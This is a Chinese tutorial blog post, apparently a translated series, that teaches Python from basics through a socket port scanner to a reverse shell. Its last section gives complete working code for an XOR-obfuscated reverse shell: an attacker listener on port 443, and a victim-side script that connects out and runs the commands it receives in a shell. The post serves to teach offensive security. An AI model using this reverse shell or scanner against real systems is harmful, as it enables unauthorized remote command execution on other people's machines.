安科网

黑客学习笔记:从Hello World到编写PoC

higher0

higher0

2019-03-03

关注 关注

本篇包含原文的前几部分:

0x0 – Getting Started - 从零开始
0x1 – Getting Started Pt.2 - 进阶
0x2 – Port Scanner - 端口扫描 
0x3 – Reverse Shell - 反向shell

0×0 – Getting Started – 从零开始

Python是一种十分强大的脚本语言,你可以直接的在Python解释器中编写代码或储存在文本中以便于直接执行,本文假设读者已经拥有装载好Python2.x.的Linux操作系统(译者使用的kali Linux),有其他编程经验特别是进行过C/C++语言入门学习的读者需要注意Python中强制使用缩进,我们从打开Python解释器开始。

打开终端,执行'python'命令打开Python解释器:

~$ python
Python 2.7.3
Type "help", "copyright", "credits" or "license" for more information.
>>>
>>>

黑客学习笔记:从Hello World到编写PoC

我们现在就可以在Python解释器中直接编写代码。我们定义两个变量,并用type()函数查看我们定义的变量是字符串还是整形:

>>> 
>>> ip = '8.8.8.8'
>>> port = 53
>>> type(ip)
<type 'str'>
>>> 
>>> type(port)
<type 'int'>
>>>

黑客学习笔记:从Hello World到编写PoC

很明显,我们定义了名为‘ip’的字符串变量和一个名为‘port’的整形变量,并且我们使用type()函数指出了变量的类型。

我们可以使用内置的help()函数来了解一些特别的函数的功能:

>>>
>>>help(type)
>>>

按q退出帮助

将数值转成字符串,并使用‘+’拼接多个字符串然后打印,这是一个常用的功能:

>>> 
>>> print "The IP is: " + ip + " and the port is: " + str(port)
The IP is: 8.8.8.8 and the port is: 53
>>>

黑客学习笔记:从Hello World到编写PoC

在上面这条代码中,‘ip’已经是一个字符型变量可以用‘+’直接与其他字符串链接在一起,而‘port’变量需要从数值型转换成字符串型,如果没有使用str()函数,执行结果会报错:

黑客学习笔记:从Hello World到编写PoC

对于字符串,我们还可以进行索引、切片和取长度的操作:

>>> 
>>> domain = 'freebuf.com'
>>> domain
'freebuf.com'
>>> domain[0]
'f'
>>> domain[0:7]
'freebuf'
>>> domain[3:]
'ebuf.com'
>>> len(domain)
11
>>>

黑客学习笔记:从Hello World到编写PoC

注意:索引也可以是负值,此时从右侧开始计数,但-0和0一样,负的索引从-1开始。

len()函数可以返回字符串的长度。

split可以将字符串分割成列表:

>>> help(ip.split)
>>> string = ip + ':' + str(port)
>>> string 
'8.8.8.8:53'
>>> string.split(':')
['8.8.8.8', '53']
>>>

split是一个很有用的功能,在上面的例子里我们指定以‘:’为分隔就字符分割成了一个列表(list),同时我们可以使用‘append’和‘remove’对列表进行增加和删除的操作:

>>> list = string.split(':')
>>> list
['8.8.8.8', '53']
>>> list[0]
'8.8.8.8'
>>> list[1]
'53'
>>> list.append('google')
>>> list
['8.8.8.8', '53', 'google']
>>> list.remove('google')
>>> list
['8.8.8.8', '53']
>>>

黑客学习笔记:从Hello World到编写PoC

黑客学习笔记:从Hello World到编写PoC

使用Python模块(Modules)可以用更少的代码来实现更复杂的功能,Python有许多内置的模块(os,subprocess,socket,urllib,httplib,re,sys等),并且Python可以使用更多的第三方模块(cymruwhois,scapy,dpkt,spider等)。例如os模块可以在Python里调用系统命令:

>>> import os
>>> os.system("echo 'RnJlZUJ1Zg==' | base64 -d")
FreeBuf0
>>>

用Python对文件进行操作,下面的例子将会演示如何创建一个文件对象,并对文件进行读/写:

>>> 
>>> file = open('test.txt','w')
>>> file.write('Hello World')
>>> file.close()
>>> file = open('test.txt','r')
>>> file.readlines()
['Hello World']
>>>

黑客学习笔记:从Hello World到编写PoC

退出Python交互界面可以按Ctrl+z

0×1 – Getting Started Pt.2 – 进阶

一个Python脚本的基础结构:

黑客学习笔记:从Hello World到编写PoC

函数的定义,注意在Python组成函数体的语句在下一行开始必须缩进:

def MyFunction:
 ...do work...
 return output

#在主函数中调用定义的函数

def main():
 output = MyFunction(input)

一个完整可执行的函数实例:

#!/usr/bin/python
def fib(n):
 a,b = 0,1
 while a < n:
 print a,
 a,b = b,a+b
def main():
 fib(20)
if __name__=="__main__":
 main()

执行的结果是打印了一串菲波那契数,fib(n)被定义生成上界为n的菲波那契数列的函数。

黑客学习笔记:从Hello World到编写PoC

黑客学习笔记:从Hello World到编写PoC

在这份说明中会对Python中类进行介绍,下面是一个类的实例,并且调用了linux系统中host命令。

黑客学习笔记:从Hello World到编写PoC

黑客学习笔记:从Hello World到编写PoC

黑客学习笔记:从Hello World到编写PoC

黑客学习笔记:从Hello World到编写PoC

由于我们编写的Python程序是在CLI(command-line interface,命令行界面)下运行的,下面的例子展示了如何使用sys模块让Python程序接收参数,使用任意一种文本编辑器编写下面的代码并保存成“.py"文件:

import sys
script = sys.argv[0]
ip = sys.argv[1]
port = sys.argv[2]
print "[+] The script name is: " + script
print "[+] The IP is: " + ip + " and the port is: " + port

sys.argv是一个以字符串形式保存命令行参数的列表,上述代码保存成.py文件执行结果:

黑客学习笔记:从Hello World到编写PoC

0×2 – Port Scanner – 端口扫描

在阅读本节之前,我建议读者再次巩固前两节的知识,并且尝试编写一些.py程序,虽然可能会出现一连串的错误,请不要灰心,本文毕竟不是学习Python语言的捷径,文档和搜索引擎会帮助我们少走很多弯路。

在本节中将会演示如何编写一个简单的Python端口扫面程序。本节中将会利用到socket编程知识,请读者先行预习了解。

在这之前我们先尝试Python中两种循环语法:

while语句用于重复执行直到某个表达式为真:

>>> port = 1000
>>> while port < 1024:
... print "The port is: " + str(port)
... port = port + 1
... 
The port is: 1000
The port is: 1001
The port is: 1002
The port is: 1003
The port is: 1004
The port is: 1005
The port is: 1006
The port is: 1007
The port is: 1008
The port is: 1009
The port is: 1010
The port is: 1011
The port is: 1012
The port is: 1013
The port is: 1014
The port is: 1015
The port is: 1016
The port is: 1017
The port is: 1018
The port is: 1019
The port is: 1020
The port is: 1021
The port is: 1022
The port is: 1023
>>>

for用法,下面的例子中用到了可以实现遍历一个数字序列的range()函数:

>>> 
>>> for port in range(1000, 1024):
... print "[+] The port is: " + str(port)
... 
[+] The port is: 1000
[+] The port is: 1001
[+] The port is: 1002
[+] The port is: 1003
[+] The port is: 1004
[+] The port is: 1005
[+] The port is: 1006
[+] The port is: 1007
[+] The port is: 1008
[+] The port is: 1009
[+] The port is: 1010
[+] The port is: 1011
[+] The port is: 1012
[+] The port is: 1013
[+] The port is: 1014
[+] The port is: 1015
[+] The port is: 1016
[+] The port is: 1017
[+] The port is: 1018
[+] The port is: 1019
[+] The port is: 1020
[+] The port is: 1021
[+] The port is: 1022
[+] The port is: 1023
>>>

请注意,再次提醒编写Python程序要注意缩进,否则会报错。

上面的代码片段将会成为端口扫描程序的基础框架,我们调用内置的socket模块,尝试几个例子:

首先我在我的机器上开启了ssh服务,这样我的22端口也随之打开

>>> import socket
>>> s = socket.socket()
>>> s.connect(('127.0.0.1', 22))
>>> s.send('FreeBuf 
')
9
>>> banner = s.recv(1024)
>>> print banner
SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u2
Protocol mismatch.
>>>

在上面的代码片段中调用了socket模块并用connect()函数链接了相应的IP和端口号,这样就会建立一个相应的TCP链接(SYN/SYN-ACK/ACK),用send()函数发送数据并用recv()函数接收相应。我们将端口号改成23(这是一个没有开启的端口),看一下会有什么结果:

>>> import socket
>>> s = socket.socket()
>>> s.connect(('127.0.0.1', 23))
Traceback (most recent call last):
 File "<stdin>", line 1, in <module>
 File "/usr/lib/python2.7/socket.py", line 224, in meth
 return getattr(self._sock,name)(*args)
socket.error: [Errno 111] Connection refused
>>>

报错了,我们可以使用‘try/except’来处理报错:

>>> try:
... s.connect(('127.0.0.1', 23))
... except: pass
... 
>>>

没有出现错误提示,现在我们结合一下上面的代码段,编写一个简单的端口扫描程序:

scan.py:

import socket
for port in range(20,25):
 try:
 s = socket.socket()
 print "[+] Attempting to connect to 127.0.0.1: " + str(port)
 s.connect(('127.0.0.1', port))
 s.send('scan')
 banner = s.recv(1024)
 if banner:
 print "[+] Port " + str(port) + " open: 
" + banner
 s.close()
 except: pass

运行结果:

黑客学习笔记:从Hello World到编写PoC

也可以将常见端口和要扫描的ip添加进数组:

import socket
ports = [21, 22, 53, 445, 80, 443, 3389, 8080]
hosts = ['127.0.0.1', '10.10.10.10', '192.168.1.1']
for host in hosts:
 for port in ports:
 try:
 s = socket.socket()
 print "[+] Attempting to connect to " + host + ":" + str(port)
 s.connect((host, port))
 s.send('absdkfbsdafblabldsfdbfhasdflbf /n')
 banner = s.recv(1024)
 if banner:
 print "[+] " + host + ":" + str(port) + " open: 
" + banner
 s.close()
 except: 
 pass

运行结果:

黑客学习笔记:从Hello World到编写PoC

0×3 – Reverse Shell – 反向shell

在本节前读者有必要再进行一个socket通信实验,在这里以UDP作为例子:

server端udp_server.py:

import socket
host = ''
port = 1024
buf_size = 128
addr = (host, port)
udp_server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_server.bind(addr)
while True:
 print 'wating for message...'
 data, addr = udp_server.recvfrom(buf_size)
 print '...received from and return to:' + str(addr) + ": " + data
udp_server.close()

client端udp_client.py:

import socket
host = 'localhost'
port = 1024
buf_size = 128
addr = (host, port)
udp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
 data = raw_input('>')
 if not data:
 break
 udp_client.sendto(data, addr)
udp_client.close()

效果如图:

黑客学习笔记:从Hello World到编写PoC

黑客学习笔记:从Hello World到编写PoC

黑客学习笔记:从Hello World到编写PoC

下面是一个简单的反向shell的代码实例,假设我们的反向shell在“受害者”的电脑上运行,“攻击者”可以远程与反向shell进行通信,并在“受害者”的电脑中执行命令并回显结果。

“攻击者”端,与反向shell进行链接,发送指令,接受指令执行的回显:

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 443))
s.listen(2048)
print "Listening on port 443... "
(client, (ip, port)) = s.accept()
print " recived connection from : ", ip
while True:
 command = raw_input('~$ ')
 encode = bytearray(command)
 for i in range(len(encode)):
 encode[i] ^= 0x41 
 client.send(encode)
 en_data = client.recv(2048) 
 decode = bytearray(en_data)
 for i in range(len(decode)):
 decode[i] ^= 0x41
 print decode
client.close()
s.close()

“受害者”端,反向shell,与“攻击端”进行链接,接受并执行指令,并发送回显:

#!/usr/bin/python
import socket, subprocess, sys
RHOST = sys.argv[1]
RPORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
while True:
 # receive XOR encoded data from network socket
 data = s.recv(1024)
 # XOR the data again with a '\x41' to get back to normal data
 en_data = bytearray(data)
 for i in range(len(en_data)):
 en_data[i] ^= 0x41
 # Execute the decode data as a command.
 # The subprocess module is great because we can PIPE STDOUT/STDERR/STDIN to a variable
 comm = subprocess.Popen(str(en_data), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)
 comm.wait()
 STDOUT, STDERR = comm.communicate() 
 print STDERR
 # Encode the output and send to RHOST
 en_STDOUT= bytearray(STDOUT)
 for i in range(len(en_STDOUT)):
 en_STDOUT[i] ^= 0x41
 s.send(en_STDOUT)
s.close()

效果如图:

黑客学习笔记:从Hello World到编写PoC

黑客学习笔记:从Hello World到编写PoC

注:修改了原文中的代码,增加了一句“comm.wait()“。

最后,想学习Python的小伙伴们!

请关注+私信回复:“学习”就可以拿到一份我为大家准备的Python学习资料!

黑客学习笔记:从Hello World到编写PoC

pytyhon学习资料

黑客学习笔记:从Hello World到编写PoC

python学习资料

python poc

higher0

higher0

0 关注 1 粉丝 0 动态

关注 关注

相关推荐

python 发送get请求接口详解

  如果想用python做接口测试,我们首先有不得不了解和学习的模块。虽然Python内置的urllib模块,用于访问网络资源。但是,它用起来比较麻烦,而且,缺少很多实用的高级功能。更好的方案是使用。它是一个Python第三方库,处理URL资源特别方便。R

YENCSDN 2020-11-17

python 使用tkinter+you-get实现视频下载器

#获取屏幕尺寸以计算布局参数,使窗口居屏幕中央,其中width和height为界面宽和高。#阻止窗口调整大小

lsjweiyi 2020-11-17

python中requests模拟登录的三种方式(携带cookie/session进行请求网站)

session是在cookie的基础上,服务端设置session时会向浏览器发送设置一个设置cookie的请求,这个cookie包括session的id当访问服务端时带上这个session_id就可以获取到用户保存在服务端对应的session. 到此这篇关

houmenghu 2020-11-17

python开发一个解析protobuf文件的简单编译器

最近刚刚用python写完了一个解析protobuf文件的简单编译器,深感ply实现词法分析和语法分析的简洁方便。乘着余热未过,头脑清醒,记下一点总结和心得,方便各位pythoner参考使用。如果你不是从事编译器或者解析器的开发工作,你可能从未听说过ply

Erick 2020-11-17

python 下载文件的多种方法汇总

本文档介绍了 Python 下载文件的各种方式,从下载简单的小文件到用断点续传的方式下载大文件。使用 Requests 模块的 get 方法从一个 url 上下载文件,在 python 爬虫中经常使用它下载简单的网页内容。使用 python 内置的 url

HeyShHeyou 2020-11-17

Linux Shell 如何获取参数的方法

是显示最后命令的退出状态,0表示没有错误,其他表示有错误。不同点:$* 和 $@ 都表示传递给函数或脚本的所有参数,不被双引号(" ")包含时,都以"$1" "$2" …"$n"

以梦为马不负韶华 2020-10-20

python跨文件使用全局变量的实现

但是他的一大缺陷就是只能本module 中也就是本文件中使用,跳出这个module就不行。使用一个更宏观的思路,全局变量就用全局加载的模块解决,很遗憾也是不行,这样可以,但是如果再有一个module 想用呢?这样就会报错,因为import 加载就会执行一遍

lhtzbj 2020-11-17

Python爬虫破解登陆哔哩哔哩的方法

作为一名找不到工作的爬虫菜鸡人士来说,登陆这一块肯定是个比较大的难题。从今天开始准备一点点对大型网站进行逐个登陆破解。加深自己爬虫水平。if response_json['code'] == 0 and response_json['data']['sta

夜斗不是神 2020-11-17

python调用百度API实现人脸识别

# """ 你的 APPID AK SK """. # img = Image.fromarray #将每一帧转为Image. # output_buffer = BytesIO() #创

pythonjw 2020-11-17

Python调用ffmpeg开源视频处理库,批量处理视频

strcmd = r'ffprobe -print_format json -show_streams -i "{}"'.format. strcmd = 'ffmpeg -i "{}" -vcodec copy -

dingwun 2020-11-16

详解python os.path.exists判断文件或文件夹是否存在

os即operating system,Python 的 os 模块封装了常见的文件和目录操作。os.path模块主要用于文件的属性获取,exists是“存在”的意思,所以顾名思义,os.path.exists()就是判断括号里的文件是否存在的意思,括号内

lhxxhl 2020-11-16

python实现在列表中查找某个元素的下标示例

列表中字符和数字都有。使用python的内建函数enumerate

sunskyday 2020-11-16

python如何获得list或numpy数组中最大元素对应的索引

#表示最大值在第二行第二列

sizhixht 2020-11-16

Python实现列表索引批量删除的5种方法

开头,如果不仔细看好像没什么问题。但是结果却是错误的。将 listObj.remove() 改为listObj.pop结果也是相同的。Java用同样的编程思想,得到的结果也有相似性。这种错误,主要是初学者对于数据存储原理没有理解清楚,或者,没有意识到内存存

坚持是一种品质 2020-11-16

python 爬虫如何实现百度翻译

本文将会通过爬虫的方式实现简单的百度翻译。本文中的代码只供学习,不允许作为于商务作用。若有侵犯,立即删文!在网站文件中找到隐藏的免费api。传入api所需要的参数并对其发出请求。在返回的json结果里找到相应的翻译结果。进入百度翻译,随便输入一段需要翻译的

染血白衣 2020-11-16

致命错误!Python开发者的7个崩溃瞬间

本文转载自公众号“读芯术”。毫无疑问,Python是当今使用最为广泛的编程语言。但无论你经验多丰富,或是已使用过多少种语言,切换到Python时都不能保证非常顺利。具有面向对象编程背景的开发人员容易忽略Python的惯用特性,很可能会滥用编程结构,从而产生

huavhuahua 2020-11-20

针对Python开发人员的10个“疯狂”的项目构想

最棒的是,你可以通过这些有趣但也具有挑战性的项目来增强 Python 编程技能。你知道 Python 是被称为 全能编程语言 的吗?是的,它确实是,虽然不应该在每个项目中都使用它。你可以使用它来创建桌面应用程序、游戏、移动应用程序、网站和系统软件。它甚至是

meylovezn 2020-11-20

用Python内置模块处理ini配置文件

开发人员每天都在处理一些大型而复杂的项目, 而配置文件会帮到我们并节省不少时间。在处理配置文件过程中,无需更改源代码本身,只需要调整配置文件即可访问不同的API接口、更新基础URL信息或其它事情。尽管可以通过多种方式来支持软件中的配置文件,包括JSON,

逍遥友 2020-11-20

VS Code 中 Python 扩展的部分功能重构,支持 R 和 Julia

11 月 12 日,微软将 Jupyter Notebook 支持从 Python 扩展中独立出来,发布新的 Jupyter 扩展,支持智能感知,调试等功能的交互式编程和计算。Jupyter 扩展通过新的“ Native Notebooks Experi

weiiron 2020-11-16

Python五个隐藏的特性,你可能从未听说过

在本文中,我将向您展示Python中很常见的5个特性。有经验的Python开发人员可能认识其中一些。然而,这对其他人仍将是未知的。是的,你没看错,在Python中...是一个有效的构造。...是称为省略号的单例对象。如果你把它输入到Python解释器中,你

Yasin 2020-11-16
higher0

higher0

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号